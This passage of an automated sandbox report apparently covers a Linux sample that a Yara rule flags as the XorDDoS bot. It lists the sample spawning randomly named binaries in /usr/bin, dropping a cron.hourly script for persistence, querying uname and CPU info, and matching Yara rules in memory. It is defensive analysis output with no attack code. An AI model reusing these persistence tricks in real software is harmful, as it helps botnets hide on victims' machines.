Source: /usr/bin/xodlvzjoas (PID: 6450)	File: /usr/bin/xodlvzjoas	Jump to behavior
Source: /usr/bin/xodlvzjoas (PID: 6453)	File: /usr/bin/xodlvzjoas	Jump to behavior
Source: /usr/bin/xodlvzjoas (PID: 6456)	File: /usr/bin/xodlvzjoas	Jump to behavior
Source: /usr/bin/xodlvzjoas (PID: 6460)	File: /usr/bin/xodlvzjoas	Jump to behavior
Source: /usr/bin/xodlvzjoas (PID: 6462)	File: /usr/bin/xodlvzjoas	Jump to behavior
Source: /usr/bin/jflhtagbsg (PID: 6468)	File: /usr/bin/jflhtagbsg	Jump to behavior
Source: /usr/bin/jflhtagbsg (PID: 6471)	File: /usr/bin/jflhtagbsg	Jump to behavior
Source: /usr/bin/jflhtagbsg (PID: 6474)	File: /usr/bin/jflhtagbsg	Jump to behavior
Source: /usr/bin/jflhtagbsg (PID: 6479)	File: /usr/bin/jflhtagbsg	Jump to behavior
Source: /usr/bin/jflhtagbsg (PID: 6480)	File: /usr/bin/jflhtagbsg	Jump to behavior
Source: /usr/bin/pzvxnaaphf (PID: 6485)	File: /usr/bin/pzvxnaaphf	Jump to behavior
Source: /usr/bin/pzvxnaaphf (PID: 6490)	File: /usr/bin/pzvxnaaphf	Jump to behavior
Source: /usr/bin/pzvxnaaphf (PID: 6493)	File: /usr/bin/pzvxnaaphf	Jump to behavior
Source: /usr/bin/pzvxnaaphf (PID: 6496)	File: /usr/bin/pzvxnaaphf	Jump to behavior
Source: /usr/bin/pzvxnaaphf (PID: 6497)	File: /usr/bin/pzvxnaaphf	Jump to behavior
Source: /usr/bin/kvwpsxprqf (PID: 6502)	File: /usr/bin/kvwpsxprqf	Jump to behavior
Source: /usr/bin/kvwpsxprqf (PID: 6507)	File: /usr/bin/kvwpsxprqf	Jump to behavior
Source: /usr/bin/kvwpsxprqf (PID: 6510)	File: /usr/bin/kvwpsxprqf	Jump to behavior
Source: /usr/bin/kvwpsxprqf (PID: 6513)	File: /usr/bin/kvwpsxprqf	Jump to behavior
Source: /usr/bin/kvwpsxprqf (PID: 6514)	File: /usr/bin/kvwpsxprqf	Jump to behavior
Source: /usr/bin/mkiihbalnq (PID: 6519)	File: /usr/bin/mkiihbalnq	Jump to behavior
Source: /usr/bin/mkiihbalnq (PID: 6524)	File: /usr/bin/mkiihbalnq	Jump to behavior
Source: /usr/bin/mkiihbalnq (PID: 6528)	File: /usr/bin/mkiihbalnq	Jump to behavior
Source: /usr/bin/mkiihbalnq (PID: 6532)	File: /usr/bin/mkiihbalnq	Jump to behavior
Source: /usr/bin/mkiihbalnq (PID: 6533)	File: /usr/bin/mkiihbalnq	Jump to behavior
Source: /usr/bin/azkwpscekh (PID: 6539)	File: /usr/bin/azkwpscekh	Jump to behavior
Source: /usr/bin/azkwpscekh (PID: 6542)	File: /usr/bin/azkwpscekh	Jump to behavior
Source: /usr/bin/azkwpscekh (PID: 6545)	File: /usr/bin/azkwpscekh	Jump to behavior
Source: /usr/bin/azkwpscekh (PID: 6550)	File: /usr/bin/azkwpscekh	Jump to behavior
Source: /usr/bin/azkwpscekh (PID: 6551)	File: /usr/bin/azkwpscekh	Jump to behavior
Source: /usr/bin/apkjkvmecw (PID: 6557)	File: /usr/bin/apkjkvmecw	Jump to behavior
Source: /usr/bin/apkjkvmecw (PID: 6560)	File: /usr/bin/apkjkvmecw	Jump to behavior
Source: /usr/bin/apkjkvmecw (PID: 6566)	File: /usr/bin/apkjkvmecw	Jump to behavior
Source: /usr/bin/apkjkvmecw (PID: 6568)	File: /usr/bin/apkjkvmecw	Jump to behavior
Source: /usr/bin/apkjkvmecw (PID: 6569)	File: /usr/bin/apkjkvmecw	Jump to behavior
Source: /usr/bin/zflxucbsae (PID: 6576)	File: /usr/bin/zflxucbsae	Jump to behavior
Source: /usr/bin/zflxucbsae (PID: 6581)	File: /usr/bin/zflxucbsae	Jump to behavior
Source: /usr/bin/zflxucbsae (PID: 6582)	File: /usr/bin/zflxucbsae	Jump to behavior
Source: /usr/bin/zflxucbsae (PID: 6585)	File: /usr/bin/zflxucbsae	Jump to behavior
Source: /usr/bin/zflxucbsae (PID: 6586)	File: /usr/bin/zflxucbsae	Jump to behavior
Source: /usr/bin/lnwhdmdpfq (PID: 6595)	File: /usr/bin/lnwhdmdpfq	Jump to behavior
Source: /usr/bin/lnwhdmdpfq (PID: 6599)	File: /usr/bin/lnwhdmdpfq	Jump to behavior
Source: /usr/bin/lnwhdmdpfq (PID: 6603)	File: /usr/bin/lnwhdmdpfq	Jump to behavior
Source: /usr/bin/lnwhdmdpfq (PID: 6604)	File: /usr/bin/lnwhdmdpfq	Jump to behavior
Source: /usr/bin/lnwhdmdpfq (PID: 6605)	File: /usr/bin/lnwhdmdpfq	Jump to behavior
Source: /usr/bin/cuofybetod (PID: 6613)	File: /usr/bin/cuofybetod	Jump to behavior
Source: /usr/bin/cuofybetod (PID: 6618)	File: /usr/bin/cuofybetod	Jump to behavior
Source: /usr/bin/cuofybetod (PID: 6620)	File: /usr/bin/cuofybetod	Jump to behavior
Source: /usr/bin/cuofybetod (PID: 6621)	File: /usr/bin/cuofybetod	Jump to behavior

Source: /tmp/fuck.elf (PID: 6236)	Path: /etc/cron.hourly/gcc.sh			Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	Path: /run/gcc.pid			Jump to dropped file

Source: /tmp/fuck.elf (PID: 6235)	Queries kernel information via 'uname':	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zfyjfaoiow (PID: 6271)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zfyjfaoiow (PID: 6274)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zfyjfaoiow (PID: 6276)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zfyjfaoiow (PID: 6279)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zfyjfaoiow (PID: 6282)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/hwcijqdbza (PID: 6289)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/hwcijqdbza (PID: 6292)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/hwcijqdbza (PID: 6295)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/hwcijqdbza (PID: 6297)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/hwcijqdbza (PID: 6299)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ggsxjmacxa (PID: 6306)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ggsxjmacxa (PID: 6309)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ggsxjmacxa (PID: 6311)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ggsxjmacxa (PID: 6314)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ggsxjmacxa (PID: 6317)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/sanzuhhixf (PID: 6323)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/sanzuhhixf (PID: 6326)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/sanzuhhixf (PID: 6328)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/sanzuhhixf (PID: 6331)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/sanzuhhixf (PID: 6333)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zkleyiegjf (PID: 6340)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zkleyiegjf (PID: 6343)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zkleyiegjf (PID: 6346)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zkleyiegjf (PID: 6348)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zkleyiegjf (PID: 6351)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xocmdvejxu (PID: 6359)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xocmdvejxu (PID: 6362)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xocmdvejxu (PID: 6365)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xocmdvejxu (PID: 6368)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xocmdvejxu (PID: 6370)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wjnxqdxblo (PID: 6377)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wjnxqdxblo (PID: 6380)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wjnxqdxblo (PID: 6383)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wjnxqdxblo (PID: 6386)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wjnxqdxblo (PID: 6389)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/oklqvchkds (PID: 6396)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/oklqvchkds (PID: 6399)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/oklqvchkds (PID: 6402)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/oklqvchkds (PID: 6405)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/oklqvchkds (PID: 6407)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/axppigwavk (PID: 6413)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/axppigwavk (PID: 6416)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/axppigwavk (PID: 6419)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/axppigwavk (PID: 6422)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/axppigwavk (PID: 6424)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ujuhiugmmi (PID: 6430)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ujuhiugmmi (PID: 6433)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ujuhiugmmi (PID: 6436)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ujuhiugmmi (PID: 6439)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ujuhiugmmi (PID: 6442)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xodlvzjoas (PID: 6449)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xodlvzjoas (PID: 6452)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xodlvzjoas (PID: 6455)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xodlvzjoas (PID: 6458)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xodlvzjoas (PID: 6461)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/jflhtagbsg (PID: 6467)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/jflhtagbsg (PID: 6470)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/jflhtagbsg (PID: 6473)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/jflhtagbsg (PID: 6476)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/jflhtagbsg (PID: 6478)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/pzvxnaaphf (PID: 6484)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/pzvxnaaphf (PID: 6487)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/pzvxnaaphf (PID: 6489)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/pzvxnaaphf (PID: 6492)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/pzvxnaaphf (PID: 6495)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/kvwpsxprqf (PID: 6501)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/kvwpsxprqf (PID: 6504)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/kvwpsxprqf (PID: 6506)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/kvwpsxprqf (PID: 6509)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/kvwpsxprqf (PID: 6512)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mkiihbalnq (PID: 6518)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mkiihbalnq (PID: 6521)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mkiihbalnq (PID: 6526)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mkiihbalnq (PID: 6529)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mkiihbalnq (PID: 6531)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/azkwpscekh (PID: 6538)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/azkwpscekh (PID: 6541)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/azkwpscekh (PID: 6544)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/azkwpscekh (PID: 6547)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/azkwpscekh (PID: 6549)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/apkjkvmecw (PID: 6556)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/apkjkvmecw (PID: 6559)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/apkjkvmecw (PID: 6562)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/apkjkvmecw (PID: 6564)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/apkjkvmecw (PID: 6567)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zflxucbsae (PID: 6573)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zflxucbsae (PID: 6575)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zflxucbsae (PID: 6578)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zflxucbsae (PID: 6580)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zflxucbsae (PID: 6584)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/lnwhdmdpfq (PID: 6592)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/lnwhdmdpfq (PID: 6594)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/lnwhdmdpfq (PID: 6597)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/lnwhdmdpfq (PID: 6600)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/lnwhdmdpfq (PID: 6602)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/cuofybetod (PID: 6611)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/cuofybetod (PID: 6614)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/cuofybetod (PID: 6616)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/cuofybetod (PID: 6619)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/jmphmmthfs (PID: 6625)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/jmphmmthfs (PID: 6627)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/jmphmmthfs (PID: 6630)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/jmphmmthfs (PID: 6632)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/jmphmmthfs (PID: 6636)	Queries kernel information via 'uname':	Jump to behavior

Source: /tmp/fuck.elf (PID: 6236)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Remote Access Functionality

Yara detected XorDDoS Bot

Source: Yara match	File source: fuck.elf, type: SAMPLE
Source: Yara match	File source: 6235.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6561.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6520.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6530.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6358.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6239.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6344.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6294.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6270.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6275.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6313.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6278.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6379.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6525.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6347.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6361.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6273.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6486.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6448.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6451.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6305.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6558.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6555.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6288.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6339.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6376.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6308.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6237.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6235, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6237, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6238, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6239, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6270, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6273, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6275, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6278, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6281, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6291, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6294, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6298, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6305, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6310, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6313, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6322, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6325, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6327, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6330, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6339, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6342, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6344, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6347, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6350, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6358, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6361, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6367, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6369, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6379, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6382, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6385, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6387, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6395, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6398, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6401, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6406, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6415, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6418, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6421, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6423, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6429, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6435, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6438, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6441, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6451, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6454, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6457, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6459, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6466, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6469, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6475, type: MEMORYSTR
